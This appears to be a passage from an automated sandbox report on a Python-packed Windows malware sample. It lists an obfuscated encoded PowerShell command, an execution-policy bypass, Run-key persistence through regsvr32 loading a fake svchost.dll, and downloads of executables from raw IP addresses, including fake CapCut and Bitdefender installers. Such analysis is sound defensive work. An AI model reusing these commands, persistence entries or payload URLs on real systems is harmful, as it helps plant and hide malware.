DcAJQA7ADMANQAyAD0AdQAhAH0ATAAwAEAAZwBlAG4AJgAsAEIAbAB3AHMASwA1ACAARQAkAFIAKQB5ACEAWwBrAFIAKABdAFkAZQAtAGUAYQB2AEIAIQBzAGsASgA3ACUAOgAmAC4AMwBqAEgAWAB7AEcAYgA3AFUAZABRAC0AZgBhAFIALAArAE4ATQB1AHQAPABzAD0ARwB6AHEARQBOAHQAdwBTACMAWwAyAD8AfAA4AEUAQgAqAEYANQBTAHoAeAAqAHYANABYAF4AVABsADUAawA5AE8AXwBIAEkAXwB2ADAAKQBWACkAcgBGAHEARQA0AHEAfQBtAEUAQgBIAGYAJQBAADQAOgAkAGEAZABhAEwATgAuAD8ANgB0ADIAKgBbAHQAWQBrADUAbgBMAC4AUwBdACwAQQA1AFsANwAkADoAYgA2ACMAeABuAGYAegBLAEMAIAB7AHwAVAByAD4AagBtAGsAXgAmADAAdABmAHoAfAB5AFYAXgBuADIAXQB7AH0ASgBzAEsAbgBeADMAYwAmAFoAcABbAHsALgB0ACgANgBEAD4APwBTADUAfABWADEAKABXAGUAagBPAGIAMQArAE8AcgBbAHEAQwBbACUAbgBGAFUAXgBzAHIAZQA7ADcAYQBjAGEALQBSAHsAZwB3AHUAXgBLACsAbgBmAGUAegBXACoAeQB9AHwAbABaADUAegBTAH0ATgBNAGEASQAsAE4AdwB4ACoAWwBoAG4ARABPAGwAVwBEAFcAKQB3AGQAJgB2ADQASQAjAG8ADQAKACMAIABOAHQASgBjAFcAYQA/ACoAZQBXAEAAaABFAD8ASgBxAGsAewAzAEsAYwBZAD0APwBmAEoAdABfAE8AYQA6AC4AfQBFAD0AbgAuADcAZgAjACoAZwA/AFcAXQBrADgARQBfAFMAUgAyAEMAYgBUAF4AUQA6ACAAZABGADUAKQBXADQAWwBtAC0AMwAmAHgAeQA6ADgAUwArAEkAWQAhAGYAWwBVAFIAfQAkAF0AUwA1AEgAeQBZACsAfAAoAFcAQgBZACgAegBEAGUARwAkAF4ALQBnAGgAWwBFADsAKABpACUAcgBfAHkAcgBZAE8ALgBuAEcAOQBGADUAfABKAG4AXwBSAHwAOAA9AD8AUwAgAHYARgAhAHUAOgBuAD4APQBZACgANwAmAE0AWQBIACUAKAArAFsARgBnAHUAWgBNAEUAQABqAFAASgBPAFgALQBPAEUALgBwAC4AZgBsAD4AZQB6AFEAdwBzAF8AeQB2ADEAPQB3AFYAIAAkAGwAWwAuAHoAcwA3AGUALQB2AHEAMABMAEUAJQBTAF8AeQBSAE8ANABIAGcAbwBpAHMAWwA3ADoARQBFAH0AeAAhACsAMABNAHkALgAjAHwAbwBKADwAWQB6AE0AYwBRAEcAbgAwAHQARABmAEMARABYAGwARwBEAHQAYgBrADMAPAAoAGgAVgAzAFcAKAArAH0AJQB9AGMAQABWAE4AdgBuADIAbQBuAGYAcwAuAHgARQBQAE4ASwBFACQAdAAxADkAawB6AEAAcgB3AG4AQwBzAHoAMwBWAHEAdQBBAG0AZwBbAFsAdQBpADAAZABpAHUAXQAzAGwARgA6AHoAagBoAHwAIwBtAEQAUQB9AHwAQgBEADQAPAA8AHYAdwBEAHcALABjADAATQBeAF4AZgA+AF4AQgBWAEkAXwBsAGEAdABrADYAMAB7ADwAWABHAEMAawB0AC0AIQBrACAAVwAuADwAZgBmAC0ARgAqAHQAWQBPAFIAcwBsAHwAcABjAGkAOQA8AG8AIAB5AEIAbQBsAFUAYwA0AGoAQABjAEMAWgBGAFIAcgBSAHoASgAyADcAcQB9AD4AawBhAHkAJABmAHEAKAArAFEAQQBHAC0ATQBXACEAMwB5AFAAIABaAGkATABKAFIANgBzACMASgAxACEARQA9AFQAPwBuAG0AUwB9AEkAVQBbACwAQQB1AGIAWQBtAEoAaQBIAEQATgAlAE0AMwBpACYAIQBmAGoAewAhAG8AUQArACoATQA5AGUASAA9ACsAeQBdACwAKwAsAHQARABWACwAWgBJAEQAIABOAEgAZwBKACoARgA3AEAAfQBYAHYAbQB2AF8AYwBBAGIAVAB3AGMAOQB7ADkAUQAjAHAAPQA2ACkAXgAtADQAVgA1AFsAWABQAFMAYwBPAG8AUABRAFQAKQB3AEsALgA8AFQAKgBIAFAANwAxADsAdQBJAE0AUwBrAHIAQgBnADsAPwBkAGsAVwB9ACkAYQBzAEUAbQBSAG8AIQBiAG8AKABpACoAdgBCAGkATwAmADsAeABNACQAXgB4ADIAbgBTAHMAUwAhAE0AMgBlAFEAZgB9AEoAQgBMAGoANQBIAG0AcABAAGYAfQBeACMAQAB1AGMAWwA/AG8AXgBAACQAIABOAEkADQAKACAAIAAgACAAIwAgAGgAKwBLAFoASwBfAGoAOAAmACYAUwBtADsAZQBIAEwAXwAhADgAMwBPAHgAJABzAEsAegBkAGQAVABkAHIAJQBhAEsAYwAxAHYALABsAE0AMAAzAG0AcwBPAGUAawB6AFgAXwBmACEAWwBQAFcAegBEAHkAIwB3AHkAeQA6ADoAIABJACYAQwBIAF4AOQBJAE4AZQAuAGkAegAmAD4AbQA/ADgATQBaADEAXwBxAHoARAA9AHgAUgBbAGwAPABHAFQAIwA2AFQAdQAxAGcAbQBqAGIAVQBSAGUALgAlAFcAcAB3ACUAbgBfACwAagBxAGoAKQB8AGQAKQBbAD4AYgAhAFgAagA1ACsAWgBpAFcALAAuAGsAKgBsAEgAJQA1AHoAOAB8AHYASgAjAEUALAA9ACUAKQA9ADoAZQB5AHgASABCAHQAIQBAACUASABwAHkAeABUAFIAPABMAE0AYQB3AGIAfAA7AEwAQABkAEQAOABsAFMAQQAzAGMAKwA5AFoAWABqAD4ADQAKACAAIAAjACAAKABrAFcAPQBpAFEAKQBVAG0AcABoAHIANQB8AF8AKwAoADoALQA3ACgAWQBfADQARwBuAHcAWgBtAHoAbgBkAEsAeQBYAHIAdwBKAD0ARwAoAHYAXgB5AH0AcwA8AG8ATwAgAEoAMABdAGsAWgBEAEsATwAjACQAbgBZADMAWwB0AG0AagAkAHIAUwBwAF4ANAA8AF4ATwA6ADEAXQBVACkANgBbAD8AZwA1AHEAbgAhAHQAQwA9AHwAZABsACsASwBkAGgAWABuAE4AaABJAFIAaQBtAGQAPwBYAGUASgBJAEgAJgAtAGMAMQB9ACwALQB5AEAAPgBDAGYAKAAtAFIAQgBTADgAOgA8AEMAJgB5AD4AawA3AGwAKgBiAGsAUAAkAD8AeAA6ACEAKwBbADMAcQBfAFUAOQBFAFAALgB0ADwANgBkAEYAZAB1ADkAdABYADkAbQB0AEcAMQBjAGgARAApAHgASQA/ADgAIQBvAHwASgAtAHgAdgByAG0AdQBZAE0APgB1AGcAdwBSAHcAVQBxAEoAPAAjAC4AUgA/ACgARABBACsAYgA/ADgAYQA5AHgANgA0AEUAIABuAEEAYQBFAGUAMwBdAGoAWgBiAEUAUwBEAEUASABdAEgAdwBDAEcAXwBnAFMARwB0AGMALABKAHQAPgBAAG8AJgApADwAbABUAFcARQByAD0AeQB1AE4ARwB1AGQAUAB3AF4ASQBHAFgAYgBAAFcARgA/AEQARQA7AEEAagBHAFIARQAzAHcAPQBLAHAAOgA4AEYAZQA+AC4ARwBFAGcAZABXAEcARwBKAHcAOgA8AGoAQgBNAFUAKwBmAD4AegBZAFcANABAACAARgB1AFMAdQAzAC4AagBMAGYAagBmAHQAZgBwAHoAIAAkAEsAUAA3AEIAPABvAEkAZQA/ACEAcgBzAC4AewBxADYAcwBSACEAQwBoACgAdQAzAGsAKwBAACAASwArAG0AQABFAG0AXgBdAFoAVwBHAHAAJQBQAGYAcQBxAFsAeQBaACoAQgBGACYAIAB0AGMAUwA1AFEAbgAoACwANgB9ACsAIQBiADEAXwBxAHcAbgBqADsAOgBqAGcATgA8ACAANwA4AHUAMwA3ADgAPgBPAE8ARQBIAGMANgBEAF8APwBtACEAQwBOADgANwB5AFsAcABjAG8AQABxAD0ANgBzAD8AbgA+AEgAXQA0AGoALQBpAGsAdgAxAFYAZAB7ACMAUQANAAoAIAAgACAAfAAlACAAIAB7AA0ACgAgACAAIAAgACMAIAAgAEkAaQBXADgAbAA3ADkARwBDAHcAPQBBAFgARQBLACQAdgBTACUARgA/ADIAdAA6AGIAewB9AE4AKQBDAGEAVQA3ADAAWgA+ACwAKAB1AEsAWABZADYAIABFAGUAVgA8AEsAeQAuAHgAPgAuADoANABuAHgAKAB7AGgAZABkAEYAcwAyAEAAcwAsAGkATgAlAHkAWwA+AHcAagB8AHUAMwBqAGwAPABHAEQAQABMAGoAMQBzAHMAWwBWAEcALAAwAF4AcQBTAEgAeQBOAHsAWABdACQAcABZAFEAVQA4AHAAMQAhACYALgByACgAbwA5AFQAIQA+AG8AMABaADYAIwA9AGkARQBZAHYAPQByAEoAcQBZAHsAQwBrAGEAWwBPAHIAOAArAEQAZQBuADoATQBqAGEAUAA0ACQAMwAzAHQAeABEAEwAQwBXAGgAUABrAEQADQAKACAAIAAgACAAJABfAC4AUgBlAGEARABUAE8AZQBOAGQAKAApAH0AKQA= | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | MSBuild.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2200 | C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s Dnscache | C:\Windows\System32\svchost.exe | services.exe | ||||||||||||
User: NETWORK SERVICE Company: Microsoft Corporation Integrity Level: SYSTEM Description: Host Process for Windows Services Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2280 | net session | C:\Windows\System32\net.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Net Command Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 2520 | powershell.exe -ExecutionPolicy Bypass -File shell.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | main.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 3108 | c:\Windows\System32\Taskmgr.exe | C:\Windows\System32\Taskmgr.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Task Manager Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| (PID) Process: | (4772) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000060282 |
| Operation: | write | Name: | VirtualDesktop |
Value: 10000000303044563096AFED4A643448A750FA41CFC7F708 | |||
| (PID) Process: | (4772) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop |
| Operation: | write | Name: | IconLayouts |
Value: 00000000000000000000000000000000030001000100010013000000000000002C000000000000003A003A007B00360034003500460046003000340030002D0035003000380031002D0031003000310042002D0039004600300038002D003000300041004100300030003200460039003500340045007D003E002000200000001000000000000000430043006C00650061006E00650072002E006C006E006B003E0020007C0000001500000000000000410064006F006200650020004100630072006F006200610074002E006C006E006B003E0020007C00000011000000000000006600690067007500720065007700650064002E007200740066003E002000200000000F00000000000000460069007200650066006F0078002E006C006E006B003E0020007C000000150000000000000047006F006F0067006C00650020004300680072006F006D0065002E006C006E006B003E0020007C000000180000000000000056004C00430020006D006500640069006100200070006C0061007900650072002E006C006E006B003E0020007C00000016000000000000004D006900630072006F0073006F0066007400200045006400670065002E006C006E006B003E0020007C00000017000000000000006500780070006500630074006500640070007500720070006F00730065002E007200740066003E002000200000000F000000000000006600650065007400650065006E002E007200740066003E002000200000001000000000000000680061007600650063006100730065002E006A00700067003E002000200000000E000000000000006C0069006E0065006F0072002E006A00700067003E002000200000000F000000000000006C006F00740073006500730074002E0070006E0067003E002000200000001400000000000000700072006F0062006C0065006D0070006F0069006E0074002E007200740066003E00200020000000110000000000000072006100740065006400660061006C006C002E007200740066003E002000200000001400000000000000720065006300650069007600650064006D0061006C0065002E007200740066003E00200020000000130000000000000077006500720069006E00670074006F006E00650073002E007200740066003E002000200000000C000000000000006D00610069006E002E006500780065003E00200020000000050000000000000061003E005C002000000001000000000000000200010000000000000000000100000000000000020001000000000000000000110000000600000001000000130000000000000000004040000000001200000000000000000000000000803F0000004008000000803F000040400900000000000000404003000000803F000080400A000000803F0000A0400B0000000040000000000C00000000400000803F0D0000000040000000400E0000000040000040400F0000000040000080401000000000000000803F01000000000000000040020000000000000080400400000000000000A04005000000803F0000000006000000803F0000803F0700000000400000A0401100 | |||
| (PID) Process: | (4772) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\Shell\Bags\1\Desktop |
| Operation: | write | Name: | IconNameVersion |
Value: 1 | |||
| (PID) Process: | (3108) Taskmgr.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\TaskManager |
| Operation: | delete value | Name: | Preferences |
Value: | |||
| (PID) Process: | (4772) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000001102BA |
| Operation: | write | Name: | VirtualDesktop |
Value: 10000000303044563096AFED4A643448A750FA41CFC7F708 | |||
| (PID) Process: | (4772) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:00000000000202A8 |
| Operation: | write | Name: | VirtualDesktop |
Value: 10000000303044563096AFED4A643448A750FA41CFC7F708 | |||
| (PID) Process: | (3108) Taskmgr.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\TaskManager |
| Operation: | write | Name: | Preferences |
Value: 0D00000060000000600000006800000068000000E3010000DC010000000001000000008000000080D8010080DF010080000100016B00000034000000130300008C020000E80300000000000000000000000000000F000000010000000000000058AAEE82F77F00000000000000000000000000002E0100001E0000008990000000000000FF00000001015002000000000D0000000000000098AAEE82F77F00000000000000000000FFFFFFFF960000001E0000008B900000010000000000000000101001000000000300000000000000B0AAEE82F77F00000000000000000000FFFFFFFF780000001E0000008C900000020000000000000001021200000000000400000000000000C8AAEE82F77F00000000000000000000FFFFFFFF960000001E0000008D900000030000000000000000011001000000000200000000000000E8AAEE82F77F00000000000000000000FFFFFFFF320000001E0000008A90000004000000000000000008200100000000050000000000000000ABEE82F77F00000000000000000000FFFFFFFFC80000001E0000008E90000005000000000000000001100100000000060000000000000028ABEE82F77F00000000000000000000FFFFFFFF040100001E0000008F90000006000000000000000001100100000000070000000000000050ABEE82F77F00000000000000000000FFFFFFFF49000000490000009090000007000000000000000004250000000000080000000000000080AAEE82F77F00000000000000000000FFFFFFFF49000000490000009190000008000000000000000004250000000000090000000000000070ABEE82F77F00000000000000000000FFFFFFFF490000004900000092900000090000000000000000042508000000000A0000000000000088ABEE82F77F00000000000000000000FFFFFFFF4900000049000000939000000A0000000000000000042508000000000B00000000000000A8ABEE82F77F00000000000000000000FFFFFFFF490000004900000039A000000B0000000000000000042509000000001C00000000000000C8ABEE82F77F00000000000000000000FFFFFFFFC8000000490000003AA000000C0000000000000000011009000000001D00000000000000F0ABEE82F77F00000000000000000000FFFFFFFF64000000490000004CA000000D0000000000000000021508000000001E0000000000000010ACEE82F77F00000000000000000000FFFFFFFF64000000490000004DA000000E000000000000000002150800000000030000000A000000010000000000000058AAEE82F77F0000000000000000000000000000D70000001E0000008990000000000000FF00000001015002000000000400000000000000C8AAEE82F77F0000000000000000000001000000960000001E0000008D900000010000000000000001011000000000000300000000000000B0AAEE82F77F00000000000000000000FFFFFFFF640000001E0000008C900000020000000000000000021000000000000C0000000000000040ACEE82F77F0000000000000000000003000000640000001E00000094900000030000000000000001021000000000000D0000000000000068ACEE82F77F00000000000000000000FFFFFFFF640000001E00000095900000040000000000000000011001000000000E0000000000000090ACEE82F77F0000000000000000000005000000320000001E00000096900000050000000000000001042001000000000F00000000000000B8ACEE82F77F0000000000000000000006000000320000001E00000097900000060000000000000001042001000000001000000000000000D8ACEE82F77F0000000000000000000007000000460000001E00000098900000070000000000000001011001000000001100000000000000F8ACEE82F77F00000000000000000000FFFFFFFF640000001E0000009990000008000000000000000001100100000000060000000000000028ABEE82F77F0000000000000000000009000000040100001E0000008F9000000900000000000000010110010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000B000000010000000000000058AAEE82F77F0000000000000000000000000000D70000001E0000009E90000000000000FF0000000101500200000000120000000000000020ADEE82F77F00000000000000000000FFFFFFFF2D0000001E0000009B90000001000000000000000004200100000000140000000000000040ADEE82F77F00000000000000000000FFFFFFFF640000001E0000009D90000002000000000000000001100100000000130000000000000068ADEE82F77F00000000000000000000FFFFFFFF640000001E0000009C900000030000000000000000011001000000000300000000000000B0AAEE82F77F00000000000000000000FFFFFFFF640000001E0000008C90000004000000000000000102100000000000070000000000000050ABEE82F77F000000000000000000000500000049000000490000009090000005000000000000000104210000000000080000000000000080AAEE82F77F000000000000000000000600000049000000490000009190000006000000000000000104210000000000090000000000000070ABEE82F77F0000000000000000000007000000490000004900000092900000070000000000000001042108000000000A0000000000000088ABEE82F77F0000000000000000000008000000490000004900000093900000080000000000000001042108000000000B00000000000000A8ABEE82F77F0000000000000000000009000000490000004900000039A00000090000000000000001042109000000001C00000000000000C8ABEE82F77F000000000000000000000A00000064000000490000003AA000000A00000000000000000110090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000008000000010000000000000058AAEE82F77F0000000000000000000000000000C60000001E000000B090000000000000FF0000000101500200000000150000000000000088ADEE82F77F00000000000000000000FFFFFFFF6B0000001E000000B1900000010000000000000000042500000000001600000000000000B8ADEE82F77F00000000000000000000FFFFFFFF6B0000001E000000B2900000020000000000000000042500000000001800000000000000E0ADEE82F77F00000000000000000000FFFFFFFF6B0000001E000000B490000003000000000000000004250000000000170000000000000008AEEE82F77F00000000000000000000FFFFFFFF6B0000001E000000B390000004000000000000000004250000000000190000000000000040AEEE82F77F00000000000000000000FFFFFFFFA00000001E000000B5900000050000000000000000042001000000001A0000000000000070AEEE82F77F00000000000000000000FFFFFFFF7D0000001E000000B6900000060000000000000000042001000000001B00000000000000A0AEEE82F77F00000000000000000000FFFFFFFF7D0000001E000000B790000007000000000000000004200100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000DA00000000000000000000000000000000000000000000009D200000200000009100000064000000320000006400000050000000320000003200000028000000500000003C0000005000000050000000320000005000000050000000500000005000000050000000500000002800000050000000230000002300000023000000230000005000000050000000500000003200000032000000320000007800000078000000500000003C00000050000000500000009700000032000000780000003200000050000000500000005000000050000000000000000100000002000000030000000400000005000000060000000700000008000000090000000A0000000B0000000C0000000D0000000E0000000F000000100000001100000012000000130000001400000015000000160000001700000018000000190000001A0000001B0000001C0000001D0000001E0000001F000000200000002100000022000000230000002400000025000000260000002700000028000000290000002A0000002B0000002C00000000000000000000001F00000000000000B400000032000000D8000000640000006400000000000000000000000000000000000000000000000000000000000000000000000000000000000000DA000000000000000000000000000000000000009D200000200000009100000064000000320000009700000050000000320000003200000028000000500000003C000000500000005000000032000000500000005000000050000000500000005000000050000000500000002800000050000000230000002300000023000000230000005000000050000000500000003200000032000000320000007800000078000000500000003C0000005000000064000000780000003200000078000000780000003200000050000000500000005000000050000000C8000000000000000100000002000000030000000400000005000000060000000700000008000000090000000A0000000B0000000C0000000D0000000E0000000F000000100000001100000012000000130000001400000015000000160000001700000018000000190000001A0000001B0000001C0000001D0000001E0000001F000000200000002100000022000000230000002400000025000000260000002700000028000000290000002A0000002B0000002C0000002D0000002E0000002F00000000000000000000001F00000000000000B400000032000000D8000000640000006400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000002000000030000000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000 | |||
| (PID) Process: | (7912) loader.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
| Operation: | write | Name: | WindowsSecurityHostProcess |
Value: regsvr32.exe /s "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start\svchost.dll" | |||
| (PID) Process: | (4772) explorer.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\ApplicationViewManagement\W32:0000000000040240 |
| Operation: | write | Name: | VirtualDesktop |
Value: 10000000303044563096AFED4A643448A750FA41CFC7F708 | |||
| (PID) Process: | (8768) WindowsUpdateLauncher.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
| Operation: | write | Name: | WindowsSecurityHost |
Value: regsvr32.exe /s "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start\svchost.dll" | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 4772 | explorer.exe | C:\Users\admin\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat | binary | |
MD5:E49C56350AEDF784BFE00E444B879672 | SHA256:A8BD235303668981563DFB5AAE338CB802817C4060E2C199B7C84901D57B7E1E | |||
| 6212 | main.exe | C:\Users\admin\AppData\Local\Temp\_MEI62122\_ctypes.pyd | executable | |
MD5:29873384E13B0A78EE9857604161514B | SHA256:3CC8500A958CC125809B0467930EBCCE88A09DCC0CEDD7A45FACF3E332F7DB33 | |||
| 6212 | main.exe | C:\Users\admin\AppData\Local\Temp\_MEI62122\_decimal.pyd | executable | |
MD5:21FCB8E3D4310346A5DC1A216E7E23CA | SHA256:9A0E05274CAD8D90F6BA6BC594261B36BFBDDF4F5CA6846B6367FE6A4E2FDCE4 | |||
| 6212 | main.exe | C:\Users\admin\AppData\Local\Temp\_MEI62122\_lzma.pyd | executable | |
MD5:D63E2E743EA103626D33B3C1D882F419 | SHA256:7C2D2030D5D246739C5D85F087FCF404BC36E1815E69A8AC7C9541267734FC28 | |||
| 6212 | main.exe | C:\Users\admin\AppData\Local\Temp\_MEI62122\_cffi_backend.cp313-win_amd64.pyd | executable | |
MD5:5CBA92E7C00D09A55F5CBADC8D16CD26 | SHA256:0E3D149B91FC7DC3367AB94620A5E13AF6E419F423B31D4800C381468CB8AD85 | |||
| 6212 | main.exe | C:\Users\admin\AppData\Local\Temp\_MEI62122\_hashlib.pyd | executable | |
MD5:3E540EF568215561590DF215801B0F59 | SHA256:0ED7A6ED080499BC6C29D7113485A8A61BDBA93087B010FCA67D9B8289CBE6FA | |||
| 6212 | main.exe | C:\Users\admin\AppData\Local\Temp\_MEI62122\VCRUNTIME140.dll | executable | |
MD5:32DA96115C9D783A0769312C0482A62D | SHA256:8B10C53241726B0ACC9F513157E67FCB01C166FEC69E5E38CA6AADA8F9A3619F | |||
| 6212 | main.exe | C:\Users\admin\AppData\Local\Temp\_MEI62122\_asyncio.pyd | executable | |
MD5:56F958EEBBC62305B4BF690D61C78E28 | SHA256:50631361EF074BE42D788818AF91D0301D22FA24A970F41F496D8272B92CFE31 | |||
| 6212 | main.exe | C:\Users\admin\AppData\Local\Temp\_MEI62122\_bz2.pyd | executable | |
MD5:684D656AADA9F7D74F5A5BDCF16D0EDB | SHA256:A5DFB4A663DEF3D2276B88866F6D220F6D30CC777B5D841CF6DBB15C6858017C | |||
| 6212 | main.exe | C:\Users\admin\AppData\Local\Temp\_MEI62122\_socket.pyd | executable | |
MD5:566CB4D39B700C19DBD7175BD4F2B649 | SHA256:77EBA293FE03253396D7BB6E575187CD026C80766D7A345EB72AD92F0BBBC3AA | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
5084 | main.exe | GET | 200 | 154.85.54.80:8989 | http://154.85.54.80:8989/02.08.2022.exe | unknown | — | — | unknown |
5084 | main.exe | GET | 200 | 185.156.72.2:80 | http://185.156.72.2/files/7700188128/RYNH1rZ.exe | unknown | — | — | unknown |
5084 | main.exe | GET | — | 110.41.169.126:8123 | http://110.41.169.126:8123/02.08.2022.exe | unknown | — | — | unknown |
5084 | main.exe | GET | — | 185.156.72.2:80 | http://185.156.72.2/files/935629868/b7VRzCg.exe | unknown | — | — | unknown |
5084 | main.exe | GET | — | 185.156.72.61:80 | http://185.156.72.61/inc/CapCut-VideoEditing_12.1.02.exe | unknown | — | — | malicious |
5084 | main.exe | GET | — | 185.156.72.61:80 | http://185.156.72.61/inc/bitdefender.exe | unknown | — | — | malicious |
5084 | main.exe | GET | — | 185.156.72.2:80 | http://185.156.72.2/files/7559408112/4eDsFzc.exe | unknown | — | — | unknown |
5084 | main.exe | GET | 200 | 45.141.233.66:2096 | http://45.141.233.66:2096/02.08.2022.exe | unknown | — | — | unknown |
5084 | main.exe | GET | 200 | 113.44.139.80:443 | http://113.44.139.80:443/02.08.2022.exe | unknown | — | — | unknown |
5084 | main.exe | GET | — | 101.42.239.131:80 | http://101.42.239.131/02.08.2022.exe | unknown | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
5944 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4512 | RUXIMICS.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
1268 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
5084 | main.exe | 151.101.2.49:443 | urlhaus.abuse.ch | FASTLY | US | whitelisted |
5084 | main.exe | 47.108.162.213:80 | — | Hangzhou Alibaba Advertising Co.,Ltd. | CN | unknown |
5084 | main.exe | 43.163.84.111:80 | — | — | SG | unknown |
5084 | main.exe | 110.41.169.126:8123 | — | Huawei Cloud Service data center | CN | unknown |
5084 | main.exe | 113.44.139.80:443 | — | — | CN | unknown |
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
urlhaus.abuse.ch |
| whitelisted |
linkury.s3-us-west-2.amazonaws.com |
| shared |
imgredientbatchingsystems.com |
| unknown |
www.js-hurling.com |
| malicious |
ayeorganization.com |
| unknown |
www.nestech.tr.45-89-28-93.cpanel.site |
| unknown |
vip.3a9.net |
| unknown |
ftp.ywxww.net |
| unknown |
raw.githubusercontent.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
5084 | main.exe | Potential Corporate Privacy Violation | POLICY [ANY.RUN] Python Suspicious User Agent |
5084 | main.exe | Potential Corporate Privacy Violation | POLICY [ANY.RUN] Python Suspicious User Agent |
5084 | main.exe | Potential Corporate Privacy Violation | POLICY [ANY.RUN] Python Suspicious User Agent |
5084 | main.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
5084 | main.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
5084 | main.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
5084 | main.exe | Potential Corporate Privacy Violation | POLICY [ANY.RUN] Python Suspicious User Agent |
5084 | main.exe | Potential Corporate Privacy Violation | POLICY [ANY.RUN] Python Suspicious User Agent |
5084 | main.exe | Potential Corporate Privacy Violation | POLICY [ANY.RUN] Python Suspicious User Agent |
5084 | main.exe | Potentially Bad Traffic | ET INFO Executable Download from dotted-quad Host |
Process | Message |
|---|---|
Assiah.exe | Ready to work
|
Assiah.exe | Initialization
|
Assiah.exe | Get update information
|
Assiah.exe | Creating folders
|
Assiah.exe | Check files for update
|
Assiah.exe | Check Antharas_FD.ukx
|
Assiah.exe | Need Update Antharas_FM.ukx
|
Assiah.exe | Need Update Antharas_FE.ukx
|
Assiah.exe | Need Update Antharas_FD.ukx
|
Assiah.exe | Check Antharas_FE.ukx
|